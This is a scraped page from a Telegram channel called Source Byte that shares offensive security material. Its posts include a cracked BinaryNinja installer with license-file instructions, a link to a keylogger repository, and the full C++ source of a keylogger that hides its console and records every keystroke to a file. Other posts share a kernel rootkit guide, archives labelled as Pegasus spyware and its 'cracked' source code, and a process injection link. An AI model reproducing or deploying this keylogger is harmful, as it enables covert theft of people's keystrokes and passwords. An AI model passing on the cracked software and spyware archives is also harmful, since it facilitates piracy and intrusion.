Source Byte – Telegram
Source Byte
7.75K subscribers
846 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
BinaryNinja-personal_v3.5.7z
249 MB
BinaryNinja_personal_3.5

Select license.dat in license folder
👍3
👍1
👍1
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
simple one i wrote

#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>

using namespace std;

void WriteToLog(LPCSTR text)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
// logFile << text;
logFile.close();
}


int main()
{
char key;
while (TRUE)
{

ShowWindow(GetConsoleWindow(), 0);
Sleep(10);
for (key = 0x8; key <= 0xBE; key++)
{
if (GetAsyncKeyState(key) == -32767)
{


ofstream logFile;
logFile.open("Keys.txt", fstream::app);
logFile << key;
logFile.close();

}
}
}
return 0;
}
❤‍🔥2
Introduction to stack management in x86-64 architecture for Windows
(credits @3shw4r)

offensivecraft.wordpress.com…



#stack , #windows , #stack_managment
🤓2
CodeMachine - Windows Kernel Rootkit Techniques-unlocked.pdf
5.2 MB
CodeMachine - Windows Kernel Rootkit Techniques

Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel

https://www.coursefather.com/2023/12/Windows-rootkits-kernel.html?m=1
1
Pegasus Spyware Zero Click.7z
18.5 MB
#Pegasus #Spy

For educational purposes only. We are not responsible for the use of this material.
❤‍🔥3
Pegasus-Cracked_By_Fsociety_Source_Code.rar
139.2 MB
Pegasus-cracked
#pegasus
Sheng_Hao_Ma_Windows_APT_Warfare_Identify_and_prevent_Windows_APT.pdf
60.7 MB
❤‍🔥1
Source Byte
Photo
❤‍🔥1
Source Byte pinned «https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/»